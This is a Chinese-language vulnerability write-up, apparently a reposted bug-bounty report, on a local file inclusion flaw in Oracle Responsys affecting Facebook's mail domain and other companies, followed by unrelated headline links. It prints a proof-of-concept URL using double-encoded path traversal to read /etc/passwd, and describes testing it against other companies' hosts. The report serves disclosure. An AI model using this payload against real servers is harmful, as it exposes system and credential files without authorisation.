一個雲本地文件包含漏洞,影響世界一流公司
先通過一張截圖看一下影響範圍吧 
本地文件包含是在Oracle Responsys的雲服務中存在的。什麼是Responsys?它是企業級基於雲的B2C系統。每個企業都會有他們獨有的IP,以便他們登錄到Responsys系統中,並且企業也不能和其他公司共享IP。
我是怎麼發現這個漏洞的?
http://em.facebookmail.com/pub/cc?_ri_=X0Gzc2X%3DWQpglLjHJlYQGkSIGbc52zaRY0i6zgzdzc6jpzcASTGzdzeRfAzbzgJyH0zfzbLVXtpKX%3DSRTRYRSY&_ei_=EolaGGF4SNMvxFF7KucKuWNhjeSKbKRsHLVV55xSq7EoplYQTaISpeSzfMJxPAX8oMMhFTpOYUvvmgn-WhyT6yBDeImov65NsCKxmYwyOL0
很明顯,系統沒有正確處理能夠跨目錄讀取的字元,導致能夠讀取整個伺服器上的信息,影響網站安全。
漏洞PoC
http://em.facebookmail.com/pub/sf/%252fetc%252fpasswd?_ri_=X0Gzc2X%3DYQpglLjHJlYQGrzdLoyD13pHoGgHNjCWGRBIk4d6Uw74cgmmfaDIiK4za7bf4aUdgSVXMtX%3DYQpglLjHJlYQGnnlO8Rp71zfzabzewzgLczg7Ulwbazahw8uszbNYzeazdMjhDzcmJizdNFCXgn&_ei_=Ep0e16vSBKEscHnsTNRZT2jxEz5WyG1Wpm_OvAU-aJZRZ_wzYDw97ETX_iSmseE
漏洞影響範圍
之後我發現這個本地文件包含漏洞不單單影響facebook,並且還有很多其他公司。他們都使用了Responsys提供的不同的私有IP。
通過google快速搜索了一下漏洞主機:
將_ri_賦值為上述的PoC,然後在目標公司的URL進行測試,哇,確實成功了。
這個漏洞會通過信息泄漏,導致整個伺服器處於高危狀態。最糟糕的是,該漏洞會對多家知名公司造成很大影響。我將這個漏洞報告給了Oracle,一周之內,漏洞得以修復。
※在VBA中使用DLL改善宏的攻擊功能
※電商安全行業再迎新風,第二屆唯品峰會成功舉辦
※價值10000美元的Uber漏洞,可隨意重置任何賬戶的密碼
TAG:嘶吼RoarTalk |
※中國軍工發布這三款武器,每一項都可以影響世界格局
※一道菜品對一個店鋪的影響有多大?
※僅此一次,二戰期間的巨頭合影,每次都深刻影響世界政治格局
※彈丸小國,因為一家電視台,影響世界
※彈丸小國,一家電視台,影響世界
※影響世界的三大人物,希特勒上榜,第一對世界影響深遠
※俄媒列出5大神秘軍事基地,每個都能影響世界,南海一基地上榜
※影響黃金榮一輩子的三個女人,一個比一個坑爹
※這個人為中國獻上一策,影響中國一千多年,至今世界都有它的影子
※麥金德《歷史的地理樞紐》:「十六本改變世界」的「巨著」之一,「心臟地帶」影響世界
※影響二戰進程的幾大戰役,有一場在中國,這叫一寸山河一寸血
※世界史上的大帝國很多,但只有這幾個深刻的影響了人類的文明體系
※甲午海戰天下聞名,那麼它對世界海軍有何影響?證明了這兩種理論
※一個外國人寫了一本書,結果影響世界近百年,至今中國都在效仿
※世界聞名的4位中國歌手,內地竟無一人上榜,她影響了整個日本!
※影響世界的奇書,搞懂一本就是位極人臣或富甲天下
※床頭櫃萬萬別傻傻只放一個,易影響卧室環境風水,後悔知道晚了
※六位影視圈存在身體缺陷的人,吳京斷指,第一位影響了半壁武打圈
※夢幻西遊:有沒有坐騎對召喚獸影響很大,內丹效果一個天一個地
※《射鵰英雄傳》有3個狀元 兩個影響了一個時代 一個卻默默無聞